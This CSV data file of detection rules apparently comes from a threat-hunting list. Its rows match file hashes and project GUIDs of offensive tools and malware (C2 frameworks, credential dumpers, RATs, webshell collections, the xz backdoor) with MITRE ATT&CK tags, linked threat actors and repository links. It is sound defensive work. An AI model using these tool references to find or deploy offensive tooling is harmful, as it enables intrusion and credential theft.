"*2321bcf59fc695ef50c4c540af7c4f76343e9ea8d1989ed0d30f33b705147d25*",".{0,1000}2321bcf59fc695ef50c4c540af7c4f76343e9ea8d1989ed0d30f33b705147d25.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23264"
"*2329a9ff31f85b197f5d1ce5af29167de3027b0b80e786080ab2a7bd046b8dd9*",".{0,1000}2329a9ff31f85b197f5d1ce5af29167de3027b0b80e786080ab2a7bd046b8dd9.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","23265"
"*233c1188ee1bfe659c4403fda91ac1ce114d9f44f6478cbbe9e8fa22b1e6c600*",".{0,1000}233c1188ee1bfe659c4403fda91ac1ce114d9f44f6478cbbe9e8fa22b1e6c600.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23269"
"*233d29b4e60407aa550a2e5984ea0fb993f946fa6d83a5505963b4ff4703009f*",".{0,1000}233d29b4e60407aa550a2e5984ea0fb993f946fa6d83a5505963b4ff4703009f.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23270"
"*233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb*",".{0,1000}233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","23271"
"*233d78a0eb44c9b9d7a92ee810f90dec29ab1778536c1b9f5d16c988ac0c70ab*",".{0,1000}233d78a0eb44c9b9d7a92ee810f90dec29ab1778536c1b9f5d16c988ac0c70ab.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23272"
"*234208515c308c4f71b418b498fd8674f60e2e2e70049e5b80e9615ce8a814d0*",".{0,1000}234208515c308c4f71b418b498fd8674f60e2e2e70049e5b80e9615ce8a814d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23273"
"*234cfdd1b014e769ee31cda9b6dd0a17c05f028a6e059e5bd4d01175e986dfb0*",".{0,1000}234cfdd1b014e769ee31cda9b6dd0a17c05f028a6e059e5bd4d01175e986dfb0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23274"
"*234ed004a8866e65677b3454c2926ae39cf417bb7702290d6c716ec835c10607*",".{0,1000}234ed004a8866e65677b3454c2926ae39cf417bb7702290d6c716ec835c10607.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23275"
"*2364f199ecada6b55a841e967f23934f3da7c22060003d96874bd9b05c28209a*",".{0,1000}2364f199ecada6b55a841e967f23934f3da7c22060003d96874bd9b05c28209a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23279"
"*2366491D74D80C76F75A7F84ABF82C1E88518A615CB2332FDCC846181F60AEAE*",".{0,1000}2366491D74D80C76F75A7F84ABF82C1E88518A615CB2332FDCC846181F60AEAE.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","23280"
"*23779f962171cb3bb425ed7cc6aca741338b9340ede2eb8fa70aad40ddcfca8f*",".{0,1000}23779f962171cb3bb425ed7cc6aca741338b9340ede2eb8fa70aad40ddcfca8f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23283"
"*237ee4007c3014829ab2635b0caa1ee4c89c3cbf71e43e76b3c1e2da0931aa00*",".{0,1000}237ee4007c3014829ab2635b0caa1ee4c89c3cbf71e43e76b3c1e2da0931aa00.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23285"
"*237f52a3509094464bb92f82a4908a60c7a4cc9db9748f0cc254e75311bb8b0d*",".{0,1000}237f52a3509094464bb92f82a4908a60c7a4cc9db9748f0cc254e75311bb8b0d.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","23286"
"*2380b9b4e364c67332ead5d26bf108ef9a022ffe93c421d27d953ea9a5500474*",".{0,1000}2380b9b4e364c67332ead5d26bf108ef9a022ffe93c421d27d953ea9a5500474.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23287"
"*238111f4c27f2bad38c5b5eac85aacf4305baaa7c854911e3cbffe7a58cc9964*",".{0,1000}238111f4c27f2bad38c5b5eac85aacf4305baaa7c854911e3cbffe7a58cc9964.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","#filehash","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","23288"
"*238214970b5fba5a7eab8d9fb50c79da888018ff2a63ad49d1114b8d478d559a*",".{0,1000}238214970b5fba5a7eab8d9fb50c79da888018ff2a63ad49d1114b8d478d559a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23289"
"*2388c7f7f1073b922d235f675e32e1b6b8809dcef1cce1113bf712402cbad1cd*",".{0,1000}2388c7f7f1073b922d235f675e32e1b6b8809dcef1cce1113bf712402cbad1cd.{0,1000}","offensive_tool_keyword","SharpEdge","C# Implementation of Get-VaultCredential - Displays Windows vault credential objects including cleartext web credentials - based on  https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-VaultCredential.ps1","T1555.004 - T1552.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/SharpEdge","1","0","#filehash","N/A","10","1","14","7","2018-07-31T01:31:21Z","2018-07-31T09:54:11Z","23290"
"*23975ac9-f51c-443a-8318-db006fd83100*",".{0,1000}23975ac9\-f51c\-443a\-8318\-db006fd83100.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","23291"
"*2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8*",".{0,1000}2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","23292"
"*2399482e1dd2f112f6d8fa93eb353891eb896dcaad033c343080bca99aac4544*",".{0,1000}2399482e1dd2f112f6d8fa93eb353891eb896dcaad033c343080bca99aac4544.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23293"
"*23a1cde43eee4ebc3c7082d5827672fbf974b25a4cdf368538e4b0af26fda677*",".{0,1000}23a1cde43eee4ebc3c7082d5827672fbf974b25a4cdf368538e4b0af26fda677.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","23295"
"*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*",".{0,1000}23A2E629\-DC9D\-46EA\-8B5A\-F1D60566EA09.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","23296"
"*23ae98fd603067f7325d89af5ed67ccee713397c2fed01ac736711a1b32e28d4*",".{0,1000}23ae98fd603067f7325d89af5ed67ccee713397c2fed01ac736711a1b32e28d4.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","23297"
"*23b63ec6ec2a3d5addcf3d67c8ce01f913f5eaf3a77159606c6d28deff2c8d6e*",".{0,1000}23b63ec6ec2a3d5addcf3d67c8ce01f913f5eaf3a77159606c6d28deff2c8d6e.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","23298"
"*23b828513db75348a8fcadd5db45d1593a5786a02b7efc1f6afb732db7ee97f2*",".{0,1000}23b828513db75348a8fcadd5db45d1593a5786a02b7efc1f6afb732db7ee97f2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23299"
"*23bdd25637e6945b0c825452e40d52f4c327f30f99fd609b71e6c6308c6a5622*",".{0,1000}23bdd25637e6945b0c825452e40d52f4c327f30f99fd609b71e6c6308c6a5622.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23301"
"*23be181e368fdf883f49f13e1ff704c2763a6b08dc1206985408b8e428440049*",".{0,1000}23be181e368fdf883f49f13e1ff704c2763a6b08dc1206985408b8e428440049.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23302"
"*23bf773ba87ff687e14a90a2c0e552eb9b04abba32dcf81d9473f921dd44b99a*",".{0,1000}23bf773ba87ff687e14a90a2c0e552eb9b04abba32dcf81d9473f921dd44b99a.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","23303"
"*23bffbd2241b534574b8a9149c2502da4960f3a185437a9f983e51eebaf8ee1d*",".{0,1000}23bffbd2241b534574b8a9149c2502da4960f3a185437a9f983e51eebaf8ee1d.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","23304"
"*23c71cff513e2be636c1084f3c8646f9601eef18b83a8010c84e824e5fd9ffba*",".{0,1000}23c71cff513e2be636c1084f3c8646f9601eef18b83a8010c84e824e5fd9ffba.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","23307"
"*23d95cfa93563a5a187125ae4caac02f2cad2132b382b2bdb9b36a28b23194af*",".{0,1000}23d95cfa93563a5a187125ae4caac02f2cad2132b382b2bdb9b36a28b23194af.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","23312"
"*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*",".{0,1000}23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","#filehash","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","23313"
"*23e1a48eba4387626c8cef3e9a8268a7e8ee36ad8e76bebfba79ce314dc4e90c*",".{0,1000}23e1a48eba4387626c8cef3e9a8268a7e8ee36ad8e76bebfba79ce314dc4e90c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23315"
"*23e478a34911f053cd097f549ab4a75a249cc03e565f9aaf512af6bb44acc61d*",".{0,1000}23e478a34911f053cd097f549ab4a75a249cc03e565f9aaf512af6bb44acc61d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23316"
"*23ecca2af6db4c425ab534b9a738f7ec152c7fcf3c250f3ce9d7f57e6259eac9*",".{0,1000}23ecca2af6db4c425ab534b9a738f7ec152c7fcf3c250f3ce9d7f57e6259eac9.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#filehash","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","23318"
"*23ed5325043d0b9e7a9115792b12817cec836ba09e5af2aab3408606da729681*",".{0,1000}23ed5325043d0b9e7a9115792b12817cec836ba09e5af2aab3408606da729681.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","23319"
"*23ef7c9571eb00b307253eafdd5821d52ccfa9a4a7225e328c450d9f6657be16*",".{0,1000}23ef7c9571eb00b307253eafdd5821d52ccfa9a4a7225e328c450d9f6657be16.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","23320"
"*23f017c0041a2164abfe06a03e3ad5b32e002e46d513f314632ed38280de8b14*",".{0,1000}23f017c0041a2164abfe06a03e3ad5b32e002e46d513f314632ed38280de8b14.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","23321"
"*23f16d48c7f318a3c087efe8ecfc2d7f6563890aae3e96680e7c22660e67c912*",".{0,1000}23f16d48c7f318a3c087efe8ecfc2d7f6563890aae3e96680e7c22660e67c912.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","23322"
"*23fcda1ac1f7e1d1644077f5e28759c56a93216e95b6a82e84654b6bfeb0acfd*",".{0,1000}23fcda1ac1f7e1d1644077f5e28759c56a93216e95b6a82e84654b6bfeb0acfd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23323"
"*24046f3805d3bc40d71b96fdacae5e02d2bc41a47cb56e178aa92bf6c373177c*",".{0,1000}24046f3805d3bc40d71b96fdacae5e02d2bc41a47cb56e178aa92bf6c373177c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23326"
"*240cce607e2c499182dd52342e9f93dc2869d22342d3cbf03b6330ce18dd38a7*",".{0,1000}240cce607e2c499182dd52342e9f93dc2869d22342d3cbf03b6330ce18dd38a7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23327"
"*241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338*",".{0,1000}241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23329"
"*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*",".{0,1000}2419CEDC\-BF3A\-4D8D\-98F7\-6403415BEEA4.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","#GUIDproject","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","23330"
